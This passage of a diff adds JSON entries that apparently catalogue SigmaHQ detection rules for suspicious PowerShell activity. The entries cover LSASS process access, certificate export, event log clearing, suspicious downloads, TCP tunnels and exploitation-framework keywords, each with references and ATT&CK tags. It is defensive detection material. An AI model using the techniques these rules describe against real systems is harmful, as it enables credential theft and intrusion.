"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "value": "PowerShell ShellCode" + }, + { + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_shellintel_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Shellntel/scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "value": "Malicious ShellIntel PowerShell Commandlets" + }, + { + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "posh_ps_software_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", + "value": "Detected Windows Software Discovery - PowerShell" + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "meta": { + "author": "frack113", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" + }, + { + "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/12", + "falsepositive": [ + "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + ], + "filename": "posh_ps_susp_clear_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "value": "Suspicious Eventlog Clear" + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_directory_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_ps_susp_download.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script" + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitimate administration script" + ], + "filename": "posh_ps_susp_execute_batch_script.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script" + }, + { + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_export_pfxcertificate.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "value": "Suspicious Export-PfxCertificate" + }, + { + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_extracting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", + "value": "Extracting Information with PowerShell" + }, + { + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + ], + "filename": "posh_ps_susp_follina_execution.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537919885031772161", + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "value": "Troubleshooting Pack Cmdlet Execution" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_getprocess_lsass.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock" + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gettypefromclsid.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute" + }, + { + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", + "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" + }, + { + "description": "Detects the use of PowerShell to identify the current logged user.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_current_user.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", + "value": "Suspicious PowerShell Get Current User" + }, + { + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_gpo.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", + "value": "Suspicious GPO Discovery With Get-GPO" + }, + { + "description": "Get the processes that are running on the local computer.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_get_process.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "af4c87ce-bdda-4215-b998-15220772e993", + "value": "Suspicious Process Discovery With Get-Process" + }, + { + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gwmi.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", + "value": "Suspicious Get-WmiObject" + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_hyper_v_condlet.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006" + ] + }, + "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "value": "Suspicious Hyper-V Cmdlets" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule)", + "creation_date": "2017/03/12", + "falsepositive": [ + "Very special / sneaky PowerShell scripts" + ], + "filename": "posh_ps_susp_invocation_generic.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ed965133-513f-41d9-a441-e38076a0798f", + "value": "Suspicious PowerShell Invocations - Generic" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific" + }, + { + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest" + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_iofilestream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream" + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "meta": { + "author": "Florian Roth, Perez Diego (@darkquassar)", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell" + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_mail_acces.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114.001" + ] + }, + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection" + }, + { + "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_mount_diskimage.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage" + }, + { + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_networkcredential.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account" + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_new_psdrive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share" + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_proxy_scripts.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_recon_export.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell" + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + 